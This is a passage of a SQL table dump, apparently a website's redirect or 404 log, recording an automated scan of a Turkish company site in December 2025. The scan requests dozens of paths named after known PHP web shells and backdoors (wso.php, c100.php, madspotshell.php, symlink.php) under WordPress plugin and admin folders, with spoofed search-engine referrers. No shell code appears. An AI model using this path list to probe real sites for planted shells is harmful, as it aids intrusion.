00:00:00',301),(51580,'http://3s-technologies.com.tr/en/sql.phpmysql.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:54:14','0000-00-00 00:00:00',301),(51581,'http://3s-technologies.com.tr/en/madspot.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:54:17','0000-00-00 00:00:00',301),(51582,'http://3s-technologies.com.tr/en/dam.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:54:19','0000-00-00 00:00:00',301),(51583,'http://3s-technologies.com.tr/en/user.phpdom.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:54:19','0000-00-00 00:00:00',301),(51584,'http://3s-technologies.com.tr/en/syrian_shell.phpxxx.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:54:24','0000-00-00 00:00:00',301),(51585,'http://3s-technologies.com.tr/en/settings.php',NULL,'https://www.google.fr/','',3,0,'2025-12-20 04:54:25','0000-00-00 00:00:00',301),(51586,'http://3s-technologies.com.tr/en/tmp.php',NULL,'https://www.google.com/','',11,0,'2025-12-20 04:54:26','0000-00-00 00:00:00',301),(51587,'http://3s-technologies.com.tr/en/cyber.php',NULL,'https://www.google.de/','',14,0,'2025-12-20 04:54:27','0000-00-00 00:00:00',301),(51588,'http://3s-technologies.com.tr/en/d4rk.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:54:29','0000-00-00 00:00:00',301),(51589,'http://3s-technologies.com.tr/en/nkr.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:54:31','0000-00-00 00:00:00',301),(51590,'http://3s-technologies.com.tr/en/m4r0c.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:54:33','0000-00-00 00:00:00',301),(51591,'http://3s-technologies.com.tr/en/sniper.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:54:34','0000-00-00 00:00:00',301),(51592,'http://3s-technologies.com.tr/en/v4team.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:54:36','0000-00-00 00:00:00',301),(51593,'http://3s-technologies.com.tr/en/offline.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:54:37','0000-00-00 00:00:00',301),(51594,'http://3s-technologies.com.tr/en/911.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:54:38','0000-00-00 00:00:00',301),(51595,'http://3s-technologies.com.tr/en/c100.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:54:40','0000-00-00 00:00:00',301),(51596,'http://3s-technologies.com.tr/en/sym.ph',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:54:41','0000-00-00 00:00:00',301),(51597,'http://3s-technologies.com.tr/en/pcp.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:54:41','0000-00-00 00:00:00',301),(51598,'http://3s-technologies.com.tr/en/tmp/w.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:54:43','0000-00-00 00:00:00',301),(51599,'http://3s-technologies.com.tr/en/tmp/king.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:54:45','0000-00-00 00:00:00',301),(51600,'http://3s-technologies.com.tr/en/tmp/ss.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:54:47','0000-00-00 00:00:00',301),(51601,'http://3s-technologies.com.tr/en/tmp/as.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:54:48','0000-00-00 00:00:00',301),(51602,'http://3s-technologies.com.tr/en/tmp/dz.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:54:49','0000-00-00 00:00:00',301),(51603,'http://3s-technologies.com.tr/en/tmp/root.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:54:52','0000-00-00 00:00:00',301),(51604,'http://3s-technologies.com.tr/en/tmp/r00t.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:54:53','0000-00-00 00:00:00',301),(51605,'http://3s-technologies.com.tr/en/templates/beez/beez.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:54:54','0000-00-00 00:00:00',301),(51606,'http://3s-technologies.com.tr/en/tmp/uploads.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:54:56','0000-00-00 00:00:00',301),(51607,'http://3s-technologies.com.tr/en/tmp/upload.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:54:57','0000-00-00 00:00:00',301),(51608,'http://3s-technologies.com.tr/en/tmp/sa.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:54:58','0000-00-00 00:00:00',301),(51609,'http://3s-technologies.com.tr/en/d0mains.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:55:03','0000-00-00 00:00:00',301),(51610,'http://3s-technologies.com.tr/en/images/root.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:55:04','0000-00-00 00:00:00',301),(51611,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/sym.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:55:05','0000-00-00 00:00:00',301),(51612,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/c22.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:55:06','0000-00-00 00:00:00',301),(51613,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/c100.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:55:07','0000-00-00 00:00:00',301),(51614,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/configuration.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:55:08','0000-00-00 00:00:00',301),(51615,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/g.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:55:09','0000-00-00 00:00:00',301),(51616,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/xx.pl',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:55:10','0000-00-00 00:00:00',301),(51617,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/ls.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:55:10','0000-00-00 00:00:00',301),(51618,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/cpanel.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:55:11','0000-00-00 00:00:00',301),(51619,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/k.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:55:12','0000-00-00 00:00:00',301),(51620,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/zone-h.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:55:13','0000-00-00 00:00:00',301),(51621,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/user.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:55:14','0000-00-00 00:00:00',301),(51622,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/sym.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:55:15','0000-00-00 00:00:00',301),(51623,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/cp.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:55:16','0000-00-00 00:00:00',301),(51624,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/madspotshell.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:55:17','0000-00-00 00:00:00',301),(51625,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/root.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:55:17','0000-00-00 00:00:00',301),(51626,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/whmcs.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:55:18','0000-00-00 00:00:00',301),(51627,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/index.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:55:19','0000-00-00 00:00:00',301),(51628,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/dz.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:55:22','0000-00-00 00:00:00',301),(51629,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/cpn.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:55:23','0000-00-00 00:00:00',301),(51630,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/changeall.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:55:23','0000-00-00 00:00:00',301),(51631,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/cgishell.pl',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:55:24','0000-00-00 00:00:00',301),(51632,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/sql.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:55:25','0000-00-00 00:00:00',301),(51633,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/0day.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:55:26','0000-00-00 00:00:00',301),(51634,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/admin.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:55:27','0000-00-00 00:00:00',301),(51635,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/l3b.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:55:28','0000-00-00 00:00:00',301),(51636,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/d.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:55:29','0000-00-00 00:00:00',301),(51637,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/d.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:55:30','0000-00-00 00:00:00',301),(51638,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/tmp/l3b.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:55:31','0000-00-00 00:00:00',301),(51639,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/sado.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:55:32','0000-00-00 00:00:00',301),(51640,'http://3s-technologies.com.tr/en/wp-content/plugins/disqus-comment-system/admin1.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:55:32','0000-00-00 00:00:00',301),(51641,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/wso.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:55:33','0000-00-00 00:00:00',301),(51642,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/dz.php',NULL,'https://www.yahoo.com/','',4,0,'2025-12-20 04:55:34','0000-00-00 00:00:00',301),(51643,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/cpanel.php',NULL,'https://www.google.co.uk/','',4,0,'2025-12-20 04:55:36','0000-00-00 00:00:00',301),(51644,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/cpn.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:55:37','0000-00-00 00:00:00',301),(51645,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/sos.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:55:38','0000-00-00 00:00:00',301),(51646,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/term.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:55:38','0000-00-00 00:00:00',301),(51647,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/sec-war.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:55:39','0000-00-00 00:00:00',301),(51648,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/sql.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:55:40','0000-00-00 00:00:00',301),(51649,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/ssl.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:55:41','0000-00-00 00:00:00',301),(51650,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/info.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:55:42','0000-00-00 00:00:00',301),(51651,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/egyshell.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:55:43','0000-00-00 00:00:00',301),(51652,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/sym.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:55:44','0000-00-00 00:00:00',301),(51653,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/c22.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:55:45','0000-00-00 00:00:00',301),(51654,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/c100.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:55:46','0000-00-00 00:00:00',301),(51655,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/configuration.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:55:47','0000-00-00 00:00:00',301),(51656,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/g.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:55:47','0000-00-00 00:00:00',301),(51657,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/xx.pl',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:55:48','0000-00-00 00:00:00',301),(51658,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/ls.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:55:49','0000-00-00 00:00:00',301),(51659,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/k.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:55:51','0000-00-00 00:00:00',301),(51660,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/zone-h.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:55:52','0000-00-00 00:00:00',301),(51661,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/user.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:55:53','0000-00-00 00:00:00',301),(51662,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/sym.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:55:54','0000-00-00 00:00:00',301),(51663,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/cp.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:55:55','0000-00-00 00:00:00',301),(51664,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/madspotshell.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:55:55','0000-00-00 00:00:00',301),(51665,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/root.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:55:56','0000-00-00 00:00:00',301),(51666,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/whmcs.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:55:57','0000-00-00 00:00:00',301),(51667,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/index.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:55:58','0000-00-00 00:00:00',301),(51668,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/dz.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:56:00','0000-00-00 00:00:00',301),(51669,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/cpn.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:56:01','0000-00-00 00:00:00',301),(51670,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/changeall.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:02','0000-00-00 00:00:00',301),(51671,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/cgishell.pl',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:03','0000-00-00 00:00:00',301),(51672,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/sql.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:04','0000-00-00 00:00:00',301),(51673,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/0day.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:56:04','0000-00-00 00:00:00',301),(51674,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/admin.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:05','0000-00-00 00:00:00',301),(51675,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/l3b.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:06','0000-00-00 00:00:00',301),(51676,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/d.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:08','0000-00-00 00:00:00',301),(51677,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/d.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:56:08','0000-00-00 00:00:00',301),(51678,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/tmp/l3b.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:56:09','0000-00-00 00:00:00',301),(51679,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/sado.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:56:10','0000-00-00 00:00:00',301),(51680,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/admin1.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:11','0000-00-00 00:00:00',301),(51681,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/upload.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:56:12','0000-00-00 00:00:00',301),(51682,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/up.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:13','0000-00-00 00:00:00',301),(51683,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/vb.zip',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:14','0000-00-00 00:00:00',301),(51684,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/vb.rar',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:56:14','0000-00-00 00:00:00',301),(51685,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/admin2.asp',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:15','0000-00-00 00:00:00',301),(51686,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/uploads.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:16','0000-00-00 00:00:00',301),(51687,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/sa.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:17','0000-00-00 00:00:00',301),(51688,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/sniper.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:56:18','0000-00-00 00:00:00',301),(51689,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/r00t-s3c.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:19','0000-00-00 00:00:00',301),(51690,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/c.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:56:19','0000-00-00 00:00:00',301),(51691,'http://3s-technologies.com.tr/en/price.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:20','0000-00-00 00:00:00',301),(51692,'http://3s-technologies.com.tr/en/wp-includes/requests/text/votes.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:56:23','0000-00-00 00:00:00',301),(51693,'http://3s-technologies.com.tr/en/wp-includes/js/crop/cropper.php',NULL,'https://duckduckgo.com/','',30,0,'2025-12-20 04:56:24','0000-00-00 00:00:00',301),(51694,'http://3s-technologies.com.tr/en/wp-includes/js/500.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:56:25','0000-00-00 00:00:00',301),(51695,'http://3s-technologies.com.tr/en/wp-admin/images/500.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:26','0000-00-00 00:00:00',301),(51696,'http://3s-technologies.com.tr/en/wp-admin/includes/500.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:27','0000-00-00 00:00:00',301),(51697,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/500.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:28','0000-00-00 00:00:00',301),(51698,'http://3s-technologies.com.tr/en/wp-admin/js/500.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:56:29','0000-00-00 00:00:00',301),(51699,'http://3s-technologies.com.tr/en/wp-admin/maint/500.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:56:30','0000-00-00 00:00:00',301),(51700,'http://3s-technologies.com.tr/en/wp-admin/network/500.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:56:30','0000-00-00 00:00:00',301),(51701,'http://3s-technologies.com.tr/en/wp-admin/user/500.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:31','0000-00-00 00:00:00',301),(51702,'http://3s-technologies.com.tr/en/wp-content/500.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:56:32','0000-00-00 00:00:00',301),(51703,'http://3s-technologies.com.tr/en/wp-content/uploads/500.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:33','0000-00-00 00:00:00',301),(51704,'http://3s-technologies.com.tr/en/wp-content/plugins/500.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:56:34','0000-00-00 00:00:00',301),(51705,'http://3s-technologies.com.tr/en/wp-content/languages/500.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:35','0000-00-00 00:00:00',301),(51706,'http://3s-technologies.com.tr/en/wp-content/languages/themes/500.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:56:36','0000-00-00 00:00:00',301),(51707,'http://3s-technologies.com.tr/en/wp-includes/simplepie/500.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:56:36','0000-00-00 00:00:00',301),(51708,'http://3s-technologies.com.tr/en/wp-includes/certificates/500.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:56:37','0000-00-00 00:00:00',301),(51709,'http://3s-technologies.com.tr/en/wp-includes/customize/500.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:56:38','0000-00-00 00:00:00',301),(51710,'http://3s-technologies.com.tr/en/wp-admin/0byte.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:44','0000-00-00 00:00:00',301),(51711,'http://3s-technologies.com.tr/en/wp-admin/sym.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:56:46','0000-00-00 00:00:00',301),(51712,'http://3s-technologies.com.tr/en/wp-admin/sym403.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:56:47','0000-00-00 00:00:00',301),(51713,'http://3s-technologies.com.tr/en/wp-admin/xl.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:48','0000-00-00 00:00:00',301),(51714,'http://3s-technologies.com.tr/en/wp-admin/symlink.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:56:49','0000-00-00 00:00:00',301),(51715,'http://3s-technologies.com.tr/en/wp-admin/404.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:56:50','0000-00-00 00:00:00',301),(51716,'http://3s-technologies.com.tr/en/wp-admin/403.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:56:51','0000-00-00 00:00:00',301),(51717,'http://3s-technologies.com.tr/en/wp-admin/xxx.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:56:53','0000-00-00 00:00:00',301),(51718,'http://3s-technologies.com.tr/en/wp-admin/ok.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:56:54','0000-00-00 00:00:00',301),(51719,'http://3s-technologies.com.tr/en/wp-admin/0.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:56:55','0000-00-00 00:00:00',301),(51720,'http://3s-technologies.com.tr/en/wp-admin/xx.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:56:57','0000-00-00 00:00:00',301),(51721,'http://3s-technologies.com.tr/en/wp-admin/z.php',NULL,'https://www.google.de/','',5,0,'2025-12-20 04:57:11','0000-00-00 00:00:00',301),(51722,'http://3s-technologies.com.tr/en/wp-admin/e.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:57:12','0000-00-00 00:00:00',301),(51723,'http://3s-technologies.com.tr/en/wp-admin/r.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:57:12','0000-00-00 00:00:00',301),(51724,'http://3s-technologies.com.tr/en/wp-admin/t.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:57:13','0000-00-00 00:00:00',301),(51725,'http://3s-technologies.com.tr/en/wp-admin/y.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:14','0000-00-00 00:00:00',301),(51726,'http://3s-technologies.com.tr/en/wp-admin/u.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:57:15','0000-00-00 00:00:00',301),(51727,'http://3s-technologies.com.tr/en/wp-admin/i.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:57:16','0000-00-00 00:00:00',301),(51728,'http://3s-technologies.com.tr/en/wp-admin/o.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:57:17','0000-00-00 00:00:00',301),(51729,'http://3s-technologies.com.tr/en/wp-admin/p.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:57:18','0000-00-00 00:00:00',301),(51730,'http://3s-technologies.com.tr/en/wp-admin/q.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:19','0000-00-00 00:00:00',301),(51731,'http://3s-technologies.com.tr/en/wp-admin/s.php',NULL,'https://www.google.de/','',5,0,'2025-12-20 04:57:20','0000-00-00 00:00:00',301),(51732,'http://3s-technologies.com.tr/en/wp-admin/d.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:21','0000-00-00 00:00:00',301),(51733,'http://3s-technologies.com.tr/en/wp-admin/f.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:22','0000-00-00 00:00:00',301),(51734,'http://3s-technologies.com.tr/en/wp-admin/g.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:57:22','0000-00-00 00:00:00',301),(51735,'http://3s-technologies.com.tr/en/wp-admin/h.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:57:23','0000-00-00 00:00:00',301),(51736,'http://3s-technologies.com.tr/en/wp-admin/j.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:57:24','0000-00-00 00:00:00',301),(51737,'http://3s-technologies.com.tr/en/wp-admin/k.php',NULL,'https://www.yahoo.com/','',6,0,'2025-12-20 04:57:25','0000-00-00 00:00:00',301),(51738,'http://3s-technologies.com.tr/en/wp-admin/l.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:26','0000-00-00 00:00:00',301),(51739,'http://3s-technologies.com.tr/en/wp-admin/m.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:57:27','0000-00-00 00:00:00',301),(51740,'http://3s-technologies.com.tr/en/wp-admin/w.php',NULL,'https://www.bing.com/','',4,0,'2025-12-20 04:57:28','0000-00-00 00:00:00',301),(51741,'http://3s-technologies.com.tr/en/wp-admin/v.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:57:29','0000-00-00 00:00:00',301),(51742,'http://3s-technologies.com.tr/en/wp-admin/n.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:30','0000-00-00 00:00:00',301),(51743,'http://3s-technologies.com.tr/en/wp-admin/b.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:57:31','0000-00-00 00:00:00',301),(51744,'http://3s-technologies.com.tr/en/wp-admin/c.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:57:32','0000-00-00 00:00:00',301),(51745,'http://3s-technologies.com.tr/en/wp-admin/wp-wso.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:57:33','0000-00-00 00:00:00',301),(51746,'http://3s-technologies.com.tr/en/wp-admin/priv8.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:57:34','0000-00-00 00:00:00',301),(51747,'http://3s-technologies.com.tr/en/wp-admin/minimo.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:34','0000-00-00 00:00:00',301),(51748,'http://3s-technologies.com.tr/en/wp-admin/v3.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:57:36','0000-00-00 00:00:00',301),(51749,'http://3s-technologies.com.tr/en/wp-admin/v5.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:57:36','0000-00-00 00:00:00',301),(51750,'http://3s-technologies.com.tr/en/wp-admin/www.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:57:37','0000-00-00 00:00:00',301),(51751,'http://3s-technologies.com.tr/en/wp-admin/100.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:57:38','0000-00-00 00:00:00',301),(51752,'http://3s-technologies.com.tr/en/wp-admin/777.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:57:39','0000-00-00 00:00:00',301),(51753,'http://3s-technologies.com.tr/en/wp-admin/defau1t.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:57:40','0000-00-00 